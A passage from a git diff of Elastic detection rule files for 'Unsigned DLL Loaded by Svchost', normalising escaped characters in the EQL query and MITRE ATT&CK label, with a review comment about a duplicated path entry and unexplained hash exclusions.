within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n 
\"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", "related_integrations": [ { "package": "endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json index 7d232fffdad..57df0c9b492 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json 
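Review bot: The `dll.path` list in the new `query` string contains `"?:\\Windows\\security\\*"` twice (once after the `ServiceState` entry and again after `TextInput`); the duplicate does not change what the rule matches but looks like an editing slip and the second occurrence should be dropped. The same duplicated entry appears in the `_3`, `_4` and `_5` versions of this rule further down, so if these files are generated from a single rule source the fix belongs there; if historical version files are deliberately frozen, apply it to the latest version only. The closing `not dll.hash.sha256 : (...)` exclusion lists five hashes with no explanation, which makes the allowlist hard to audit later; an EQL comment above it along the lines of `/* hash exclusions: <reason these DLLs are excluded - document here> */` would give maintainers the context to decide whether each one still belongs.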
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n 
\"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created 
within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n 
\"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", "related_integrations": [ { "package": "endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json index 7088ba51e71..4126e99d496 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n 
\"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created 
within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n 
\"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", "related_integrations": [ { "package": "endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json index 6dbcc6a06c6..6aba016b307 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n 
\"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n 